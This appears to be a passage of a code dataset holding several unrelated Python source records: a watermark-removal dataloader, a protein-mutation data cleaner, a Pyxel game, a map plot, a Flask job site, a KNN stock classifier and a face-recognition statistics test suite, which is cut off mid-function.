interpolation='bilinear')\r\n\r\n return water_marker_input, label\r\n\r\n def __len__(self):\r\n return len(self.bg_num)\r\n\r\n\r\ndef main():\r\n train_dataset = MyDateset()\r\n train_dataloader = paddle.io.DataLoader(\r\n train_dataset,\r\n batch_size=4,\r\n shuffle=True,\r\n drop_last=False)\r\n\r\n for step, data in enumerate(train_dataloader):\r\n img, label = data\r\n print(step, img.shape, label.shape)\r\n\r\n\r\n# 对dataloader进行测试\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"y2cyyc/Baidu_AI_WatermarkRemoval","sub_path":"dataloader2.py","file_name":"dataloader2.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"27639274753","text":"# -*- coding: utf-8 -*-\n# Install and File Managment:\nimport click\nimport logging\nfrom pathlib import Path\nfrom dotenv import find_dotenv, load_dotenv\n# Cleaning Datasets:\nimport pandas as pd\nimport numpy as np\nfrom data_class import MutantDataset\n\n\ndef Clean_Skempi(path):\n '''\n Purpose:\n 1. Loads SKEMPI CSV file.\n 2. Calculates ddG\n 3. For multiple measurements, keeps the median value\n 4. Eliminates entries with mutations on both sides of the interface\n Input:\n path : Location of SKEMPI CSV file or pd.DataFrame\n Output:\n SKEMPI_SingleSided : MutantDataset(pd.DataFrame)\n Note:\n SKEMPI specific steps are coded out here while universal\n steps are handeled by MutantDataset methods.\n Content and order subject to change with additional datasets.\n It is foreseeable that some steps may occur post combination.\n '''\n # Initialize class\n skempi = MutantDataset(path, sep=';')\n\n # Convert 'Temperature' comments/str's to numeric values. Default is 298\n skempi['Temperature'] = skempi['Temperature'].str.extract(r'(\\d+)')\n skempi['Temperature'] = skempi.to_numeric('Temperature')\n skempi['Temperature'].fillna(value=298, inplace=True) # 6665-6668 blank\n\n # Calculate free energies\n dropna_lst = ['Affinity_wt_parsed', 'Affinity_mut_parsed']\n skempi.dropna(subset=dropna_lst, inplace=True)\n skempi = skempi.solve_ddG('Affinity_wt_parsed', 'Affinity_mut_parsed')\n\n # Median and duplicate ddG/tmp values\n group_keys = ['#Pdb', 'Mutation(s)_cleaned']\n skempi['ddgMedian'] = skempi.groupby(group_keys)['ddG'].transform('median')\n skempi.drop_duplicates(subset=[*group_keys, 'Temperature'], keep='first',\n inplace=True)\n\n # Flag multiple mutations in the same protein\n skempi['MutSplit'] = skempi['Mutation(s)_cleaned'].str.split(',')\n skempi['NumMutations'] = skempi['MutSplit'].apply(len)\n\n # Extract Chains and remove cross chain mutations.\n skempi['CrossChain'] = skempi.find_cross_chains()\n SKEMPI_SingleSided = skempi[~skempi.CrossChain] # cool trick inverts bool\n return SKEMPI_SingleSided\n\n\ndef Clean_Other(path):\n '''Future dataset cleaned here'''\n pass\n\n\n# @click commands removed, extra complexity and CLI unnecessary ATM\ndef main():\n \"\"\" Runs data processing scripts to turn raw data from (../raw) into\n cleaned data ready to be analyzed (saved in ../processed).\n\n 1) clean each dataset to create consistant MutantDataset's\n 1a) store indeviduals in ~/data/intermediate\n 2) combine into uniform MutantDataset\n 2a) store in ~/data/final\n (may not save indeviduals. Rather, uniform saved to intermediate.\n then features is run(folx, iAlign) to produce final. such a change\n will be made with the implementation of feature scripts.)\n \"\"\"\n # Static\n filepath = {\n 'input': 'data/raw/',\n 'interim': 'data/interim/',\n 'output': 'data/processed/'\n }\n\n columns = ['#Pdb', 'Mutation(s)_cleaned', 'Temperature',\n 'ddgMedian', 'NumMutations']\n\n # 1.0 – Clean skempi\n skempi_cleaned = Clean_Skempi(filepath['input'] + 'skempi_2.0.csv')\n skempi_final = skempi_cleaned[columns]\n # Log Info\n NumProteins = skempi_final['#Pdb'].nunique()\n NumMutations = skempi_final['#Pdb'].count()\n print(f'There are {NumMutations} unique single sided'\n f'mutations in {NumProteins} proteins')\n # 1.0a save intermediate to interim\n skempi_final.to_csv(filepath['interim'] + 'skempi_final.csv')\n\n # 1.1 – Import Other\n # other_final = Clean_Other(filepath['input'] + 'other.csv')\n # 1.1a – save intermediate to intermediates\n # Other_final.to_csv('data/intermediate')\n\n # 2 – Combine datasets\n # code\n # 2a – save final to processed\n # combined.to_csv(data/processed')\n skempi_final.to_csv(filepath['output'] + 'skempi_final.csv')\n\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')\n\n\nif __name__ == '__main__':\n log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n logging.basicConfig(level=logging.INFO, format=log_fmt)\n\n # not used in this stub but often useful for finding various files\n project_dir = Path(__file__).resolve().parents[2]\n\n # find .env automagically by walking up directories until it's found, then\n # load up the .env entries as environment variables\n load_dotenv(find_dotenv())\n\n main()\n","repo_name":"BioSciResearch/optimus_bind_sample","sub_path":"src/data/make_dataset.py","file_name":"make_dataset.py","file_ext":"py","file_size_in_byte":4544,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"15435802022","text":"import argparse\nimport math\nfrom random import randint\n\nimport pyxel\n\n# sprite definitions are just pieces of the image(s) in the .pyxres file\n# look at it in the editor to see what I mean\n# - image number in the .pyxres file with the images (currently always 0)\n# - x coordinate in the source image to start at\n# - y coordinate in the source image\n# - width of the piece to grab\n# - height of the piece to grab\n# - [optional] what color to make transparent (-1 means no transparency)\n\n# Background Sprites\n\n# Foreground Sprites\nFLOOR_SPRITE = (0, 0, 16, 40, 8, 12)\nFRUIT_SPRITE = [\n (0, 32, 0, 16, 16, 12),\n (0, 48, 0, 16, 16, 12),\n (0, 64, 0, 16, 16, 12),\n (0, 80, 0, 16, 16, 12)\n]\nPLAYER_SPRITE = [\n (0, 0, 0, 16, 16, 12,), # Player when falling\n (0, 16, 0, 16, 16, 12,), # Player when jumping\n]\n\nBLOCK_SIZE = 16\n\n# Some level \"themes\" of blocks and ladders\nclass LevelTheme():\n def __init__(self, theme_idx):\n y = 16*theme_idx\n\n self.block_1x = (1, 0, y, 16, 16, -1)\n self.block_4x = (1, 0, y, 64, 16, -1)\n self.ladder_top = (1, 64, y, 16, 16, -1)\n self.ladder = (1, 64, y, 16, 16, -1)\n\n def draw_blocks(self, x, y, draw_w, draw_h):\n img, u, v, w, h, colkey = self.block_4x\n\n for x_offset in range(0, draw_w, 48):\n for y_offset in range(0, draw_h, 16):\n w = min(draw_w - x_offset, 48)\n h = min(draw_h - y_offset, 16)\n\n pyxel.blt(x + x_offset, y + y_offset, img, u, v, w, h, colkey)\n\nTHEME_ZIG_ZAG = LevelTheme(0)\nTHEME_GOLD_BLOCKS = LevelTheme(1)\nTHEME_BRICKS = LevelTheme(2)\nTHEME_GRASS = LevelTheme(3)\nTHEME_MASONRY = LevelTheme(4)\n\nTHEMES = [LevelTheme(i) for i in range(5)]\n\nBASE_FPS = 30\n\nclass Floor:\n def __init__(self, floor_x, floor_y, is_active, floor_width=40, floor_height=8, theme=None):\n self.floor_x = int(floor_x) * BLOCK_SIZE\n self.floor_y = int(floor_y) * BLOCK_SIZE\n self.floor_width = int(floor_width) * BLOCK_SIZE\n self.floor_height = min(self.floor_width, int(floor_height) * BLOCK_SIZE)\n self.theme = theme\n self.is_active = is_active\n\n @property\n def left(self):\n return self.floor_x\n\n @property\n def right(self):\n return self.floor_x + self.floor_width\n\n @property\n def top(self):\n return self.floor_y\n\n @property\n def bottom(self):\n return self.floor_y + self.floor_height\n\n\nclass App:\n def __init__(self, fps=BASE_FPS, speed=1.0):\n pyxel.init(256, 256, caption=\"Pyxel Toomy\", fps=fps)\n\n # Load all the images and sounds used in the game\n pyxel.load(\"assets/toomy_game.pyxres\")\n\n self.__speed = speed\n self._fps = fps\n\n # Factor to keep things running normally at different fps / speeds\n self._frame_step = speed * BASE_FPS / fps\n\n # number of frames that would have happened so far at current speed/fps\n # (adjusted when speed changes to keep things rendering at the same spot)\n self.frame_count = 0\n\n # Seconds of 1x-speed game time since game start\n self.game_time = 0.0\n\n # Player info\n self.score = 0\n self.player_x = 72\n self.player_y = 25\n self.player_vy = 0\n self.player_is_alive = True\n\n # Define the stuff on screen\n self.far_cloud = [(-10, 75), (40, 65), (90, 60)]\n self.near_cloud = [(10, 25), (70, 35), (120, 15)]\n self.floor = [\n Floor(\n randint(0, 200//BLOCK_SIZE),\n randint(8, 16),\n True,\n randint(1, 10),\n 1\n ) for i in range(5)]\n self.fruit = [(i * 60, randint(40, 104), randint(0, 3), True) for i in range(5)]\n\n # Start playing music (sound #0)\n pyxel.playm(0, loop=True)\n\n # Run the game (update/draw loop)\n pyxel.run(self.update, self.draw)\n\n @property\n def _speed(self):\n return self.__speed\n\n @_speed.setter\n def _speed(self, newval):\n # When speed changes we have to update the frame counter or background things\n # will suddenly jump around\n\n ratio = newval/self.__speed\n self.frame_count /= ratio\n self._frame_step *= ratio\n self.__speed = newval\n\n def update(self):\n if pyxel.btnp(pyxel.KEY_Q):\n pyxel.quit()\n\n if pyxel.btnp(pyxel.KEY_EQUAL):\n self._speed = min(3.0, self._speed + 0.25)\n elif pyxel.btnp(pyxel.KEY_MINUS):\n self._speed = max(0.25, self._speed - 0.25)\n\n self.frame_count += self._frame_step\n self.game_time += self._speed/self._fps\n\n self.update_player()\n\n for i, v in enumerate(self.fruit):\n self.fruit[i] = self.update_fruit(*v)\n\n def update_player(self):\n delta_x = 0\n delta_y = 0\n\n if pyxel.btn(pyxel.KEY_LEFT) or pyxel.btn(pyxel.GAMEPAD_1_LEFT):\n delta_x = self._frame_step * -2\n\n if pyxel.btn(pyxel.KEY_RIGHT) or pyxel.btn(pyxel.GAMEPAD_1_RIGHT):\n delta_x = self._frame_step * 2\n\n if pyxel.btnp(pyxel.KEY_UP) or pyxel.btnp(pyxel.GAMEPAD_1_UP):\n self.player_vy = -10\n\n if pyxel.btn(pyxel.KEY_DOWN) or pyxel.btn(pyxel.GAMEPAD_1_DOWN):\n delta_y = self._frame_step * 2\n\n delta_y += self.player_vy * self._frame_step\n\n x_valid, y_valid = self.validate_movement(delta_x, delta_y)\n\n if x_valid:\n self.player_x += delta_x\n\n if y_valid:\n self.player_y += delta_y\n self.player_vy += self._frame_step\n else:\n self.player_vy = 0\n\n if self.player_y > pyxel.height:\n if self.player_is_alive:\n self.player_is_alive = False\n pyxel.play(3, 5)\n\n if self.player_y > 600:\n self.score = 0\n self.player_x = 72\n self.player_y = -16\n self.player_vy = 0\n self.player_is_alive = True\n\n def validate_movement(self, delta_x, delta_y):\n x_valid = True\n y_valid = True\n\n for floor in self.floor:\n if (\n self.player_x + 16 + delta_x >= floor.left\n and self.player_x + delta_x <= floor.right\n\n and self.player_y + 16 >= floor.top\n and self.player_y <= floor.bottom\n ):\n x_valid = False\n\n if x_valid:\n if (\n self.player_x + 16 + delta_x >= floor.left\n and self.player_x + delta_x <= floor.right\n\n and self.player_y + 16 + delta_y >= floor.top\n and self.player_y + delta_y <= floor.bottom\n ):\n y_valid = False\n\n else:\n if (\n self.player_x + 16 >= floor.left\n and self.player_x <= floor.right\n\n and self.player_y + 16 + delta_y >= floor.top\n and self.player_y + delta_y <= floor.bottom\n ):\n y_valid = False\n\n return x_valid, y_valid\n\n def update_fruit(self, x, y, kind, is_active):\n if is_active and abs(x - self.player_x) < 12 and abs(y - self.player_y) < 12:\n is_active = False\n self.score += (kind + 1) * 100\n self.player_vy = min(self.player_vy, -8)\n pyxel.play(3, 4)\n\n # x -= 2 * self._frame_step\n\n if x < -40:\n x += 240\n y = randint(32, 104)\n kind = randint(0, 3)\n is_active = True\n\n return (x, y, kind, is_active)\n\n def draw(self):\n pyxel.cls(12)\n\n\n # draw floors\n for idx, floor in enumerate(self.floor):\n THEMES[idx].draw_blocks(floor.left, floor.top, floor.floor_width, floor.floor_height)\n #pyxel.blt(x, y, *FLOOR_SPRITE)\n\n # draw fruits\n for x, y, kind, is_active in self.fruit:\n if is_active:\n pyxel.blt(x, y, *FRUIT_SPRITE[kind])\n\n # draw player\n pyxel.blt(self.player_x, self.player_y, *PLAYER_SPRITE[1 if self.player_vy > 0 else 0])\n\n # draw score\n s = \"SCORE {:>4}\".format(self.score)\n pyxel.text(5, 4, s, 1)\n pyxel.text(4, 4, s, 7)\n\n # draw time\n t = self.game_time\n t = f\"{int(t//60)}:{t%60:04.1f}\"\n pyxel.text(pyxel.width - 4 - 4*len(t), 4, t, 1)\n pyxel.text(pyxel.width - 5 - 4*len(t), 4, t, 7)\n\n # draw current speed\n s = f\"SPEED {self._speed:0.2f}x\"\n pyxel.text(pyxel.width - 4 - 4*len(s), 11, s, 1)\n pyxel.text(pyxel.width - 5 - 4*len(s), 11, s, 7)\n\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--fps', default=75, type=int)\nparser.add_argument('--speed', default=1.0, type=float)\n\nargs = parser.parse_args()\n\nApp(fps=args.fps, speed=args.speed)\n","repo_name":"BryceEakin/pyxel_playground","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":8913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38446976529","text":"from mpl_toolkits.basemap import Basemap\nimport matplotlib.pyplot as plt\n\nmap = Basemap(projection='poly', \n lon_0=0.0, lat_0=0, \n llcrnrlon=-80.,llcrnrlat=-40,urcrnrlon=80.,urcrnrlat=40.)\n\nmap.drawmapboundary(fill_color='aqua')\nmap.fillcontinents(color='coral',lake_color='aqua')\nmap.drawcoastlines()\n\nmap.drawparallels(range(-90, 100, 10), linewidth=2, dashes=[4, 2], labels=[1,0,0,1], color='r', zorder=0 )\nplt.show()","repo_name":"rveciana/BasemapTutorial","sub_path":"code_examples/backgrounds/draw_parallels.py","file_name":"draw_parallels.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"37"} +{"seq_id":"6358168370","text":"from flask import Flask, render_template, jsonify, request\nfrom database import load_jobs_from_db, load_job_from_db, add_application_to_db\nfrom flask_sqlalchemy import SQLAlchemy\nimport os\nfrom flask_admin import Admin\n\nadmin=Admin()\ndb=SQLAlchemy()\ndef create_app():\n \n app = Flask(__name__)\n app.config['SQLALCHEMY_DATABASE_URI']=os.environ['DB_CONNECTION_STRING']\n db.init_app(app)\n admin.init_app(app)\n \n \n \n @app.route(\"/\")\n def mark_careers():\n jobs_list = load_jobs_from_db()\n return render_template('home.html', jobs = jobs_list)\n \n @app.route(\"/api/jobs\")\n def list_jobs():\n jobs_list = load_jobs_from_db()\n return jsonify(jobs=jobs_list)\n \n @app.route(\"/job/\")\n def show_job(id):\n job = load_job_from_db(id)\n if not job:\n return \"Not found\", 404\n return render_template('jobpage.html', job = job)\n \n @app.route(\"/job//apply\", methods=['post'])\n def apply_to_job(id):\n data = request.form\n job = load_job_from_db(id)\n add_application_to_db(id, data)\n return render_template('application_submitted.html', application=data, job = job)\n\n return app\n \n \n \nif __name__ == \"__main__\":\n app=create_app()\n app.run(host='0.0.0.0', debug=True)","repo_name":"kmark-n/Mark-careers_website_v2","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33760934652","text":"# KNN 알고리즘으로 주가의 향후 방향을 예측한다.\n# ------------------------------------------\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom StockData import YahooData, FeatureSet\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\n\n# Yahoo site로부터 삼성전자 주가 데이터를 수집한다\n#sam = YahooData.getStockData('005930.KS', '2007-01-01')\n\n# 저장된 파일을 읽어온다\nsam = pd.read_pickle('data/stockData/005930.KS')\n\n# 주가 데이터 (OHLCV)로부터 기술적분석 지표들을 추출한다\n# u = 0.8 : 수익률 표준편차의 0.8 배 이상이면 주가 상승 (class = 2)\n# d = -0.8 : 수익률 표준편차의 -0.8배 이하이면 주가 하락 (class = 1)\n# 아니면 주가 횡보 (classs = 0)\nft = FeatureSet.getFeatureSet(sam, u=0.8, d=-0.7, period=20)\n\n# Feature DataSet의 뒷 부분을 확인한다\nft.tail(10)\n\n# class = (0, 1, 2)가 균등한지 확인하고, 균등하지 않으면 위의 u,d를 조정하여 균등하게 만든다.\nplt.hist(ft['class'])\nplt.show()\n\n# Train 데이터 세트와 Test 데이터 세트를 구성한다\nx = ft.iloc[:, 0:6]\ny = ft['class']\ntrainX, testX, trainY, testY = train_test_split(x, y, test_size = 0.2, random_state=None)\n\n# KNN 으로 Train 데이터 세트를 학습한다.\nknn = KNeighborsClassifier(n_neighbors=50, p=2, metric='minkowski')\nknn.fit(trainX, trainY)\n\n# Test 세트의 Feature에 대한 class를 추정하고, 정확도를 계산한다\npredY = knn.predict(testX)\naccuracy = 100 * (testY == predY).sum() / len(predY)\nprint()\nprint(\"* 시험용 데이터로 측정한 정확도 = %.2f\" % accuracy, '%')\n\n# Train 세트의 Feature에 대한 class를 추정하고, 정확도를 계산한다\npredY = knn.predict(trainX)\naccuracy = 100 * (trainY == predY).sum() / len(predY)\nprint(\"* 학습용 데이터로 측정한 정확도 = %.2f\" % accuracy, '%')\n\n# k를 변화시켜가면서 정확도를 측정해 본다\ntestAcc = []\ntrainAcc = []\nfor k in range(5, 100):\n # KNN 으로 Train 데이터 세트를 학습한다.\n knn = KNeighborsClassifier(n_neighbors=k, p=2, metric='minkowski')\n knn.fit(trainX, trainY)\n \n # Test 세트의 Feature에 대한 정확도\n predY = knn.predict(testX)\n testAcc.append((testY == predY).sum() / len(predY))\n \n # Train 세트의 Feature에 대한 정확도\n predY = knn.predict(trainX)\n trainAcc.append((trainY == predY).sum() / len(predY))\n\nplt.figure(figsize=(8, 5))\nplt.plot(testAcc, label=\"Test Data\")\nplt.plot(trainAcc, label=\"Train Data\")\nplt.legend()\nplt.xlabel(\"k\")\nplt.ylabel(\"Accuracy\")\nplt.show()\n\n# 시험용 데이터의 마지막 데이터를 금일 데이터로 가정하고 향후 주가의 방향을 추정한다\n# 금일 측정된 Feature가 아래와 같다면, 향후 주가의 방향은 ?\ntodayX = pd.DataFrame([(-0.23,-1.45,0.85,0.43,-0.38,0.5)], columns=['macd', 'rsi', 'obv', 'liquidty', 'parkinson', 'volatility'])\npredY = knn.predict(todayX)\nprint()\n\nif predY == 0.0:\n print(\"* 향후 주가는 횡보할 것으로 예상됨.\")\nelif predY == 1.0:\n print(\"* 향후 주가는 하락할 것으로 예상됨.\")\nelse:\n print(\"* 향후 주가는 상승할 것으로 예상됨.\")\npredProb = knn.predict_proba(todayX)\nprint(\"* 확률 척도 : \", predProb)\n\n# 2개 Feature를 선택하여 2-차원 상에서 각 Feature에 대한 class를 육안으로 확인한다\n# 전체 Feature의 6-차원 공간의 확인은 불가하므로 2-차원으로 확인한다\nftX = 0 # x-축은 macd\nftY = 4 # y-축은 parkinson's volatility\ncnt = 100 # 100개만 그린다\nclass0 = ft[ft['class'] == 0].iloc[0:cnt, [ftX, ftY]]\ncolX = class0.columns[0]\ncolY = class0.columns[1]\n\nplt.figure(figsize=(8, 7))\nplt.scatter(class0[colX], class0[colY], color='blue', marker='x', s=100, alpha=0.5, label='FLAT')\n\nclass1 = ft[ft['class'] == 1].iloc[0:cnt, [ftX, ftY]]\nplt.scatter(class1[colX], class1[colY], color='red', marker='s', s=100, alpha=0.5, label='DOWN')\n\nclass2 = ft[ft['class'] == 2].iloc[0:cnt, [ftX, ftY]]\nplt.scatter(class2[colX], class2[colY], color='green', marker='o', s=100, alpha=0.5, label='UP')\nplt.xlabel(colX)\nplt.ylabel(colY)\nplt.legend()\nplt.show()\n","repo_name":"lyc1212/R","sub_path":"금융 데이터 사이언스/2-2.knn.py","file_name":"2-2.knn.py","file_ext":"py","file_size_in_byte":4221,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71073724588","text":"from itertools import chain\nfrom time import sleep\nfrom datetime import datetime, timedelta, timezone\nfrom uuid import uuid4\nfrom tests.system_tests import fsmRequests, base_test_class, handlers_examples, elasticRequests\nfrom tests.system_tests.test_data_option import *\n\nneededFields = {\n 'aggregator': 'count',\n 'group_by': '1m',\n}\n\n\nclass TestStatGroups(base_test_class.BaseTest):\n name = 'test_visionlabs_test_stat_groups_class'\n start = None\n stop = None\n event = None\n events = {}\n handlers = {}\n event_batches_to_create = set()\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n if args[0] in cases:\n TestStatGroups.event_batches_to_create.add(cases[args[0]])\n else:\n TestStatGroups.event_batches_to_create.add('groups')\n\n @classmethod\n def setUpClass(cls):\n # create lists\n reply = cls.lunaClient.createList('descriptors', cls.name)\n assert reply.statusCode == 201, reply.statusCode\n inputListDescriptors = reply.body['list_id']\n\n reply = cls.lunaClient.createList('persons', cls.name)\n assert reply.statusCode == 201, reply.statusCode\n inputListPersons = reply.body['list_id']\n\n reply = cls.lunaClient.createList('persons', cls.name)\n assert reply.statusCode == 201, reply.statusCode\n outputList = reply.body['list_id']\n\n # create descriptors\n for d in descriptorsImgs_search:\n reply = cls.lunaClient.extractDescriptors(filename=d)\n assert reply.statusCode == 201, reply.statusCode\n dId = reply.body[\"faces\"][0][\"id\"]\n\n reply = cls.lunaClient.linkListToDescriptor(dId, inputListDescriptors)\n assert reply.statusCode == 204, reply.statusCode\n\n # create persons\n for p in personsImgs_search:\n reply = cls.lunaClient.createPerson(cls.name)\n assert reply.statusCode == 201, reply.statusCode\n pId = reply.body['person_id']\n cls.personsToDelete += [pId]\n\n reply = cls.lunaClient.extractDescriptors(filename=p)\n assert reply.statusCode == 201, reply.statusCode\n dId = reply.body[\"faces\"][0][\"id\"]\n\n reply = cls.lunaClient.linkDescriptorToPerson(pId, dId)\n assert reply.statusCode == 204, reply.statusCode\n\n reply = cls.lunaClient.linkListToPerson(pId, inputListPersons)\n assert reply.statusCode == 204, reply.statusCode\n\n # remember last person data\n cls.sim_person = pId\n cls.sim_descriptor = dId\n\n # create handlers, events\n cls.start = datetime.now().isoformat('T').split('.')[0] + 'Z'\n for stat_type in cls.event_batches_to_create:\n reply = fsmRequests.createHandler(handlers_examples.searchHandlerTestEvents(\n cls.name, 'groups', inputListDescriptors, inputListPersons, outputList\n ))\n assert reply.statusCode == 201, reply.statusCode\n handler = reply.json['handler_id']\n cls.handlers[stat_type] = reply.json['handler_id']\n\n if stat_type == 'groups':\n reply = fsmRequests.emitEvent(handler, events_search[0],\n {'user_data': cls.name, 'source': cls.name,\n 'tags': cls.name + ',' + cls.name + '1'})\n assert reply.statusCode == 201, reply.json\n sleep(10)\n reply = fsmRequests.emitEvent(handler, events_search[0],\n {'user_data': cls.name, 'source': cls.name,\n 'tags': cls.name + ',' + cls.name + '1'})\n assert reply.statusCode == 201, reply.json\n cls.events[stat_type] = reply.json['events'][0]\n else:\n start = datetime(2017, 1, 1, 0, 0, 0, tzinfo=timezone(timedelta()))\n\n stop = {\n 'monthOfYear': datetime(2018, 1, 1, 0, 0, 0, tzinfo=timezone(timedelta())),\n 'dayOfYear': datetime(2018, 1, 1, 0, 0, 0, tzinfo=timezone(timedelta())),\n 'dayOfMonth': datetime(2017, 2, 1, 0, 0, 0, tzinfo=timezone(timedelta())),\n 'dayOfWeek': datetime(2017, 1, 8, 0, 0, 0, tzinfo=timezone(timedelta())),\n 'hourOfDay': datetime(2017, 1, 2, 0, 0, 0, tzinfo=timezone(timedelta())),\n 'minuteOfDay': datetime(2017, 1, 2, 0, 0, 0, tzinfo=timezone(timedelta())),\n }[stat_type]\n\n delta = {\n 'monthOfYear': timedelta(days=31),\n 'dayOfYear': timedelta(days=1),\n 'dayOfMonth': timedelta(days=1),\n 'dayOfWeek': timedelta(days=1),\n 'hourOfDay': timedelta(hours=1),\n 'minuteOfDay': timedelta(minutes=1),\n }[stat_type]\n\n def uploadAsync(startPeriod, stopPeriod, deltaForPeriod):\n current = startPeriod\n dates = []\n while current < stopPeriod:\n dates.append(current)\n current += deltaForPeriod\n\n iterByDates = iter(dates)\n from tornado import gen\n import tornado.ioloop\n\n @gen.coroutine\n def upload(it):\n for uploadDate in it:\n reply = yield elasticRequests.emitGroupAsync(uploadDate.timestamp() * 1000, handler,\n cls.name)\n assert reply.code < 300\n\n tornado.ioloop.IOLoop.current().run_sync(lambda: [upload(iterByDates) for i in range(10)])\n\n uploadAsync(start, stop, delta)\n sleep(1)\n cls.stop = datetime.now().isoformat('T').split('.')[0] + 'Z'\n\n def setUp(self):\n pass\n\n def assertAgregate(self, result, filtersOk, filtersNOk=None):\n defaultFilters = {\n 'aggregator': 'count',\n 'group_by': '1d',\n\n 'handler_ids': result['handler_id']\n }\n if any(f in chain(filtersOk, filtersNOk or {}) for f in defaultFilters):\n defaultFilters = {}\n\n # TP - FP\n reply = fsmRequests.statsGroups({**defaultFilters, **filtersOk})\n self.assertEqual(reply.statusCode, 200, reply.statusCode)\n self.assertEqual(reply.json['total'], 1, reply.json['total'])\n if {**defaultFilters, **filtersOk}['aggregator'] == 'count':\n self.assertEqual(reply.json['hits'][0][1], 2, reply.json['hits'][0][1])\n elif filtersOk['target'] == 'age':\n self.assertAlmostEqual(reply.json['hits'][0][1], result['extract']['attributes'][filtersOk['target']],\n msg=reply.json['hits'][0][1], delta=1)\n else:\n self.assertEqual(reply.json['hits'][0][1], result['extract']['attributes'][filtersOk['target']],\n reply.json['hits'][0][1])\n\n if filtersNOk is not None:\n # TN - FN\n reply = fsmRequests.statsGroups({**defaultFilters, **filtersNOk})\n self.assertEqual(reply.statusCode, 200, reply.statusCode)\n self.assertEqual(reply.json['total'], 0, reply.json['total'])\n\n def test_count_aggregator(self):\n self.assertAgregate(\n self.events['groups'],\n {\n 'aggregator': 'count',\n 'group_by': '1d',\n\n 'handler_ids': self.events['groups']['handler_id']\n }\n )\n\n def test_max_age_aggregator(self):\n self.assertAgregate(\n self.events['groups'],\n {\n 'aggregator': 'max',\n\n 'group_by': '1d',\n 'target': 'age',\n 'handler_ids': self.events['groups']['handler_id'],\n }\n )\n\n def test_avg_age_aggregator(self):\n self.assertAgregate(\n self.events['groups'],\n {\n 'aggregator': 'avg',\n\n 'group_by': '1d',\n 'target': 'age',\n 'handler_ids': self.events['groups']['handler_id'],\n }\n )\n\n def test_min_age_aggregator(self):\n self.assertAgregate(\n self.events['groups'],\n {\n 'aggregator': 'min',\n\n 'group_by': '1d',\n 'target': 'age',\n 'handler_ids': self.events['groups']['handler_id'],\n }\n )\n\n def test_min_gender_aggregator(self):\n self.assertAgregate(\n self.events['groups'],\n {\n 'target': 'gender',\n\n 'aggregator': 'min',\n 'group_by': '1d',\n 'handler_ids': self.events['groups']['handler_id'],\n }\n )\n\n def test_group_by_edges(self):\n create_time__gt = '2017-01-01T00:00:00Z'\n for group_by_true, group_by_false, create_time__lt in (\n ('5s', '4s', '2017-01-01T01:00:00Z'),\n ('1m', '59s', '2017-01-02T00:00:00Z'),\n ('10m', '9m', '2017-02-01T00:00:00Z'),\n ('1h', '59m', '2018-01-01T00:00:00Z'),\n ('1d', '23h', '2020-01-01T00:00:00Z'),\n ):\n params = {'create_time__gt': create_time__gt, 'create_time__lt': create_time__lt,\n 'group_by': group_by_true, 'aggregator': 'count'}\n reply = fsmRequests.statsGroups(params)\n self.assertEqual(reply.statusCode, 200, reply.statusCode)\n\n params['group_by'] = group_by_false\n reply = fsmRequests.statsGroups(params)\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json,\n {'error_code': 12024, 'detail': \"Group step '{}' is too low\".format(group_by_false)},\n reply.json)\n\n def assertFrequencyGroupBy(self, reply, total, shift):\n self.assertEqual(reply.statusCode, 200, str(reply.statusCode) + ' ' + str(reply.json))\n self.assertEqual(reply.json['total'], total, reply.statusCode)\n self.assertEqual(reply.json['hits'], [[str(i), 1] for i in range(shift, shift + total)], reply.statusCode)\n\n def test_group_by_monthOfYear(self):\n params = {\n 'aggregator': 'count',\n 'group_by': 'monthOfYear',\n 'sources': self.name,\n 'handler_ids': self.handlers['monthOfYear'],\n }\n self.assertFrequencyGroupBy(fsmRequests.statsGroups(params), 12, 1)\n\n def test_group_by_dayOfYear(self):\n params = {\n 'aggregator': 'count',\n 'group_by': 'dayOfYear',\n 'handler_ids': self.handlers['dayOfYear'],\n 'sources': self.name,\n }\n self.assertFrequencyGroupBy(fsmRequests.statsGroups(params), 365, 1)\n\n def test_group_by_dayOfMonth(self):\n params = {\n 'aggregator': 'count',\n 'group_by': 'dayOfMonth',\n 'handler_ids': self.handlers['dayOfMonth'],\n 'sources': self.name,\n }\n self.assertFrequencyGroupBy(fsmRequests.statsGroups(params), 31, 1)\n\n def test_group_by_dayOfWeek(self):\n params = {\n 'aggregator': 'count',\n 'group_by': 'dayOfWeek',\n 'handler_ids': self.handlers['dayOfWeek'],\n 'sources': self.name,\n }\n self.assertFrequencyGroupBy(fsmRequests.statsGroups(params), 7, 1)\n\n def test_group_by_hourOfDay(self):\n params = {\n 'aggregator': 'count',\n 'group_by': 'hourOfDay',\n 'handler_ids': self.handlers['hourOfDay'],\n 'sources': self.name,\n }\n self.assertFrequencyGroupBy(fsmRequests.statsGroups(params), 24, 0)\n\n def test_group_by_minuteOfDay(self):\n params = {\n 'aggregator': 'count',\n 'group_by': 'minuteOfDay',\n 'handler_ids': self.handlers['minuteOfDay'],\n 'sources': self.name,\n }\n self.assertFrequencyGroupBy(fsmRequests.statsGroups(params), 1440, 0)\n\n def test_time_filter(self):\n self.assertAgregate(\n self.events['groups'],\n {\n 'create_time__gt': self.start,\n 'create_time__lt': self.stop,\n },\n {\n 'create_time__gt': self.stop,\n }\n )\n\n def test_gender_filter(self):\n gender = round(self.events['groups']['extract']['attributes']['gender'])\n\n 